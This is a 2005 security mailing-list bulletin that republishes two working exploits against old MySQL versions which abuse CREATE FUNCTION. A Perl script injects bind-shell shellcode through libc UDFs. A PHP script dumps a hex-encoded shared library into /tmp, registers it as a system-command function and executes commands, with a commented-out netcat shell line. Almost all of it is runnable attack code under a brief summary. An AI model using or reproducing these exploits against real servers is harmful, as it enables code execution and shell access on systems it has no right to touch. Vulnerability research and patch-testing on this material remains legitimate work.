[EXPL] MySQL "CREATE FUNCTION" Exploits

• Previous message: SecuriTeam: "[TOOL] Snmpfuzz - SNMPv1 Fuzzer"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 14 Mar 2005 11:42:17 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  MySQL "CREATE FUNCTION" Exploits
------------------------------------------------------------------------

SUMMARY

The following two exploits utilize MySQL's internal "CREATE FUNCTION"
mechanism to inject arbitrary code and cause its execution under the
privileges of the MySQL user.

DETAILS

Exploit (Code Injection):
#!/usr/bin/perl
## Mysql CREATE FUNCTION libc arbitrary code execution.
##
## Author: Stefano Di Paola
## Vulnerable: Mysql <= 4.0.23, 4.1.10
## Type of Vulnerability: Local/Remote - input validation
## Tested On : Mandrake 10.1 /Debian Sarge
## Vendor Status: Notified on March 2005
##
## Copyright 2005 Stefano Di Paola (stefano.dipaola@wisec.it)
##
##
## Disclaimer:
## In no event shall the author be liable for any damages
## whatsoever arising out of or in connection with the use
## or spread of this information.
## Any use of this information is at the user's own risk.
##
##
##
## It calls on_exit(address)
## then overwrites the address with strcat or strcpy
## and then calls exit
##
## Usage:
## perl myexp.pl numberofnops offset
## Example:
## perl myexp.pl 3 0
################################################

use strict;
use DBI();
use Data::Dumper;
use constant DEBUG => 0;
use constant PASS => "USEYOURPASSHERE";
# Connect to the database.
my $dbh = DBI->connect("DBI:mysql:database=test;host=localhost",
"root", PASS ,{'RaiseError' => 1});

### This is the opcode pointed by the address where on_exit jumps
###
###
### 0x3deb jmp 0x3d
### but needs to be decremented by 2. ("shell",0x0x3de9,0)
## -1 -1 = 0x3de9-2
# resulting in 0x3deb
## 0x3d is the distance from the address on_exit calls and the beginning
of
## bind shell "\x6a\x66\x58\x6a\x01....
my $jmp=0x3de9+($ARGV[1]<<8);
printf("Using %x\n",$jmp);
my $zeros="0,"x($jmp);
### Bind_shell... works.....but maybe needs some nop \x90
### so i use argv[0] to repeat \x90
### It binds a shell to port 2707 (\x0a\x93)
my $shell= ("\x90"x$ARGV[0])."\x6a\x66\x58\x6a\x01".
"\x5b\x99\x52\x53\x6a\x02\x89".
"\xe1\xcd\x80\x52\x43\x68\xff\x02\x0a\x93\x89\xe1".
"\x6a\x10\x51\x50\x89\xe1\x89\xc6\xb0\x66\xcd\x80".
"\x43\x43\xb0\x66\xcd\x80\x52\x56\x89\xe1\x43\xb0".
"\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80".
"\x41\xe2\xf8\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f".
"\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";

########### Bash !!!!!!!!!!!###############
# my $shell=("\x90"x$ARGV[0])."\x6a\x0b\x58\x99\x52\x68".
# "\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80";
my $onex_create="create function on_exit returns integer soname
'libc.so.6';";
print $onex_create,"\n" if(DEBUG);
my $sth = $dbh->prepare($onex_create);
if (!$sth) {
print "Error:" . $dbh->errstr . "\n";
}
eval {$sth->execute};
if($@){
print "Error:" . $sth->errstr . "\n";
}

my $strcat_create="create function strcat returns string soname
'libc.so.6';";
print $strcat_create,"\n" if(DEBUG);
my $sth = $dbh->prepare($strcat_create);
if (!$sth) {
print "Error:" . $dbh->errstr . "\n";
}
eval {$sth->execute};
if($@){
print "Error:" . $sth->errstr . "\n";
}

my $exit_create="create function exit returns integer soname
'libc.so.6';";
print $exit_create,"\n" if(DEBUG);
my $sth = $dbh->prepare($exit_create);
if (!$sth) {
print "Error:" . $dbh->errstr . "\n";
}
eval {$sth->execute};
if($@){
print "Error:" . $sth->errstr . "\n";
}

my $onex="select on_exit('".$shell."',".$zeros."0), strcat(0);";
print "select on_exit('".$shell."', 0), strcat(0);";
print $onex,"\n" if(DEBUG);
my $sth = $dbh->prepare($onex);
if (!$sth) {
print "Error:" . $dbh->errstr . "\n";
}
print "Select on_exit\n";

if (!$sth->execute) {
print "Error:" . $sth->errstr . "\n";
}
while (my $ref = $sth->fetchrow_hashref()) {
print Dumper($ref);
}

my $strc="select strcat('".$shell."',".$zeros."0), exit(0);";
print $strc,"\n" if(DEBUG);
$sth = $dbh->prepare($strc);
if (!$sth) {
print "Error:" . $dbh->errstr . "\n";
}

if (!$sth->execute) {
print "Error:" . $sth->errstr . "\n";
}
print "Select exit\n";

Exploit (Library Injection):
<?
/*************************************
** Mysql CREATE FUNCTION func table arbitrary library injection
**
** Author: Stefano Di Paola
** Vulnerable: Mysql <= 4.0.23, 4.1.10
** Type of Vulnerability: Local/Remote Privileges Escalation - input
validation
** Tested On : Mandrake 10.1 /Debian Sarge
** Vendor Status: Notified on March 2005
**
** Copyright 2005 Stefano Di Paola (stefano.dipaola@wisec.it)
**
**
** Disclaimer:
** In no event shall the author be liable for any damages
** whatsoever arising out of or in connection with the use
** or spread of this information.
** Any use of this information is at the user's own risk.
**
**
*************************************
*/

// this is the MySql root password.
$pass='useyoupasswordhere';

function mysql_create_db($db,$link)
{
$query="CREATE database $db;";
return mysql_query($query, $link) ;

}
// the library in little endian hex. (from NGS's Hackproofing_MySql
// http://www.nextgenss.com/papers/HackproofingMySQL.pdf )
$solib="0x7f454c46010101000000000000000000030003000100000 \
02006000034000000340a000000000000340020000400280016001 \
500010000000000000000000000000000009407000094070000050 \
000000010000001000000940700009417000094170000040100000 \
80100000600000000100000020000009c070000 \
9c1700009c170000c8000000c8000000060000000400000051e5746 \
4000000000000000000000000000000 \
00000000000600000004000000250000002800000000000000260 \
000000000000000000000000000000000 \
000000000000220000002700000000000000000000000000000000 \
00000000000000000000000000000000 \
00000000000000230000001e000000000000000000000000000000 \
00000000000000002000000000000000 \
00000000000000000000000021000000250000000000000000000 \
000000000002400000000000000000000 \
00000000000000000000000000000000000000000000000000000 \
000000000000000000000000000000000 \
00000000000000000000000000000000000000000000000000000 \
000000000000000000000000000000000 \
00000000000000000000000000000000000000000000000000000 \
000000000000000000000000000000000 \
000000001c000000000000001f000000000000001d000000000000 \
00000000000000000000000000000000 \
0000000000b4000000000000000300010000000000f00100000000 \
00000300020000000000700400000000 \
00000300030000000000100500000000000003000400000000006 \
005000000000000030005000000000090 \
050000000000000300060000000000c00500000000000003000700 \
00000000d00500000000000003000800 \
00000000e805000000000000030009000000000020060000000000 \
0003000a000000000074070000000000 \
0003000b0000000000900700000000000003000c00000000009417 \
00000000000003000d00000000009c17 \
00000000000003000e0000000000641800000000000003000f0000 \
0000006c180000000000000300100000 \
000000741800000000000003001100000000007818000000000000 \
03001200000000009818000000000000 \
030013000000000000000000000000000300140000000000000000 \
00000000000300150000000000000000 \
000000000003001600000000000000000000000000030017000000 \
00000000000000000000030018000000 \
000000000000000000000300190000000000000000000000000003 \
001a0000000000000000000000000003 \
001b00010000009c170000000000001100f1ff6100000000000000 \
76000000120000002f000000d0050000 \
00000000120008007900000098180000000000001000f1ff350000 \
00740700000000000012000b003b0000 \
000000000097000000220000005e000000080700003600000012 \
000a007200000098180000000000001000 \
f1ff0a00000078180000000000001100f1ff850000009c18000000 \
0000001000f1ff4a0000000000000000 \
0000002000000020000000000000000000000020000000005f445 \
94e414d4943005f474c4f42414c5f4f46 \
465345545f5441424c455f005f5f676d6f6e5f73746172745f5f005f \
696e6974005f66696e69005f5f6378 \
615f66696e616c697a65005f4a765f5265676973746572436c6173 \
73657300646f5f73797374656d006c69 \
62632e736f2e36005f6564617461005f5f6273735f737461727400 \
5f656e6400474c4942435f322e312e33 \
00474c4942435f322e3000000000000000000000000000000000 \
0000000000000000000000000000000000 \
000000000000000000000000000000000000000000000000010 \
00200010001000100030001000100010001 \
000000000001000200680000001000000000000000731f69090 \
00003008a000000100000001069690d0000 \
02009600000000000000941700000800000098170000080000 \
002b070000021d00008c1800000621000090 \
18000006260000941800000627000084180000072100008818 \
0000072600005589e583ec08e845000000e8 \
e0000000e85b010000c9c300ffb304000000ffa3080000000000 \
0000ffa30c0000006800000000e9e0ffff \
ffffa3100000006808000000e9d0ffffff00000000000000005589 \
e553e8000000005b81c34f120000528b \
831c00000085c07402ffd0585bc9c39090909090909090909090 \
909090905589e553e8000000005b81c31f \
1200005180bb200000000075348b931400000085d2752f8b83 \
20ffffff8b1085d2741783c004898320ffff \
ffffd28b8320ffffff8b1085d275e9c68320000000018b5dfcc9c38 \
3ec0c8b831cffffff50e846ffffff83 \
c410ebbd89f68dbc27000000005589e553e8000000005b81c3af1 \
10000508b83fcffffff85c0740a8b8318 \
00000085c0750b8b5dfcc9c38db60000000083ec0c8d83fcfffff \
f50e809ffffff83c4108b5dfcc9c39055 \
89e583ec088b450c8338017409c745fc00000000eb1a83ec0c8b \
450c8b4008ff30e8fcffffff83c410c745 \
fc000000008b45fcc9c390905589e55653e8000000005b81c32 \
e1100008d83f0ffffff8d70fc8b40fc83f8 \
ff740c83ee04ffd08b0683f8ff75f45b5e5dc390905589e553e80 \
00000005b81c3fb10000050e8c6feffff \
595bc9c3000000000000941700007018000001000000680000 \
000c000000d00500000d0000007407000004 \
000000b4000000050000007004000006000000f00100000a00 \
0000a00000000b0000001000000003000000 \
781800000200000010000000140000001100000017000000c0 \
050000110000009005000012000000300000 \
0013000000080000001600000000000000feffff6f60050000ff \
ffff6f01000000f0ffff6f10050000faff \
ff6f02000000000000000000000000000000000000000000000 \
00000000000000000000000000000000000 \
000000ffffffff00000000ffffffff00000000000000009c1700000 \
000000000000000fe0500000e060000 \
000000000000000000000000004743433a2028474e55292033 \
2e332e3120284d616e6472616b65204c696e \
757820392e3220332e332e312d316d646b2900004743433a20 \
28474e552920332e332e3120284d616e6472 \
616b65204c696e757820392e3220332e332e312d326d646b29 \
00004743433a2028474e552920332e332e31 \
20284d616e6472616b65204c696e757820392e3220332e332e \
312d326d646b2900004743433a2028474e55 \
2920332e332e3120284d616e6472616b65204c696e757820 \
392e3220332e332e312d326d646b2900004743 \
433a2028474e552920332e332e3120284d616e6472616b65 \
204c696e757820392e3220332e332e312d316d \
646b2900002e7368737472746162002e68617368002e6479 \
6e73796d002e64796e737472002e676e752e76 \
657273696f6e002e676e752e76657273696f6e5f72002e7265 \
6c2e64796e002e72656c2e706c74002e696e \
6974002e74657874002e66696e69002e65685f6672616d650 \
02e64617461002e64796e616d6963002e6374 \
6f7273002e64746f7273002e6a6372002e676f74002e62737 \
3002e636f6d6d656e74000000000000000000 \
000000000000000000000000000000000000000000000000 \
000000000000000000000b0000000500000002 \
000000b4000000b40000003c01000002000000000000000 \
400000004000000110000000b00000002000000 \
f0010000f001000080020000030000001c0000000400000010 \
000000190000000300000002000000700400 \
0070040000a0000000000000000000000001000000000000 \
0021000000ffffff6f02000000100500001005 \
000050000000020000000000000002000000020000002e00 \
0000feffff6f02000000600500006005000030 \
000000030000000100000004000000000000003d0000000 \
900000002000000900500009005000030000000 \
0200000000000000040000000800000046000000090000000 \
2000000c0050000c005000010000000020000 \
000900000004000000080000004f0000000100000006000000 \
d0050000d005000017000000000000000000 \
000004000000000000004a0000000100000006000000e80 \
50000e805000030000000000000000000000004 \
0000000400000055000000010000000600000020060000 \
2006000054010000000000000000000010000000 \
000000005b00000001000000060000007407000074070000 \
1a000000000000000000000004000000000000 \
006100000001000000020000009007000090070000040000 \
00000000000000000004000000000000006b00 \
0000010000000300000094170000940700000800000000000 \
0000000000004000000000000007100000006 \
000000030000009c1700009c070000c80000000300000000 \
00000004000000080000007a00000001000000 \
0300000064180000640800000800000000000000000000000 \
4000000000000008100000001000000030000 \
006c1800006c0800000800000000000000000000000400000 \
0000000008800000001000000030000007418 \
0000740800000400000000000000000000000400000000000 \
0008d00000001000000030000007818000078 \
08000020000000000000000000000004000000040000009 \
200000008000000030000009818000098080000 \
0400000000000000000000000400000000000000970000 \
0001000000000000000000000098080000fa0000 \
0000000000000000000100000000000000010000000300 \
0000000000000000000092090000a00000000000 \
0000000000000100000000000000";

$link=mysql_connect("127.0.0.1","root",$pass);
if (!$link) {
die('Could not connect: ' . mysql_error());
}
echo "Connected successfully as root\n";
echo "creating db for lib\n";
mysql_create_db('my_db',$link) or print ('cannot create my_db db,
sorry!');
echo "done....\n";
echo "selecting db for lib\n";
mysql_select_db('my_db') or print ('cannot use my_db db, sorry!');
echo "done....\n";

echo "creating blob table for lib\n";
$query="CREATE TABLE blob_tab (blob_col BLOB);";
$result = mysql_query($query, $link) or print("cannot create blob table
for lib\n");
echo "done....\n";

echo "inserting blob table for lib\n";
$query="INSERT into blob_tab values (CONVERT($solib,CHAR));";
$result = mysql_query($query, $link) or print("cannot insert blob for
lib\n");
echo "done....\n";

echo "dumping lib in /tmp/libso.so.0...\n";
$query="SELECT blob_col FROM blob_tab INTO DUMPFILE '/tmp/libso.so.0';";
$result = mysql_query($query, $link) or print("cannot dump lib\n");
echo " done....\n";

mysql_select_db('mysql') or die ('cannot use mysql db, sorry!');
echo "sending lib....\n";

$query="insert into func (name,dl) values
('do_system','/tmp/libso.so.0');";
$result = mysql_query($query, $link);
echo "done....\n";
echo "Creating exit function to restart server\n";

$query="create function exit returns integer soname 'libc.so.6';";
$result = mysql_query($query, $link) or print ("cannot create exit,
sorry!\n");
echo "done....\n";
echo "Selecting exit function\n";

$query="select exit();";
$result = mysql_query($query, $link);
echo "done!\nWaiting for server to restart\n";

sleep(1);

$link=mysql_connect("127.0.0.1","root",$pass);
if (!$link) {
die('Could not connect: ' . mysql_error());
}
echo "Connected to MySql server again...\n";

//$cmd ='/usr/sbin/nc -l -p 8000 -e /bin/bash';
$cmd ='id >/tmp/id';
echo "Sending Command...$cmd\n";
$query="select do_system('$cmd');";
$result = mysql_query($query, $link);
echo "done!\n";
echo "Now use your fav shell and ls /tmp/id -l \n";
mysql_close($link);

?>

ADDITIONAL INFORMATION

The information has been provided by <mailto:stefano.dipaola@wisec.it>
Stefano Di Paola.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[TOOL] Snmpfuzz - SNMPv1 Fuzzer"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages [UNIX] Bacula Insecure Temporary File Creation and Information Disclosure ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... allow attackers to cause symbolic link attacks to create arbitrary files ... 17 echo "quit">>$tmp ... They are 2 vulnerabilities, symlink attack and password ... (Securiteam) [EXPL] Claroline Remote Code Execution (Exploit) ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Claroline Remote Code Execution ... echo "by rgod rgod at autistici.org\r\n"; ... (Securiteam) [EXPL] myBlogger trackback SQL Injection ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A vulnerability in myBloggie allows remote attackers ... echo "administrative credentials disclosure exploit\n"; ... echo 'No response from '.$host.':'.$port; die; ... (Securiteam) [EXPL] Lotus Domino Webmail Password Hash Dumper (Exploit) ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Lotus Domino WebMail, with "Generate HTML for all fields" enabled stores ... (Securiteam) [EXPL] Qpopper Poppassd Local Root (Linux, FreeBSD, Exploit, ld.so.preload) ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... privileges and execute arbitrary code using Qpopper poppassd. ... echo "FreeBSD Qpopper poppassd latest version local r00t exploit by kcope" ... cat> program.c << _EOF ... (Securiteam)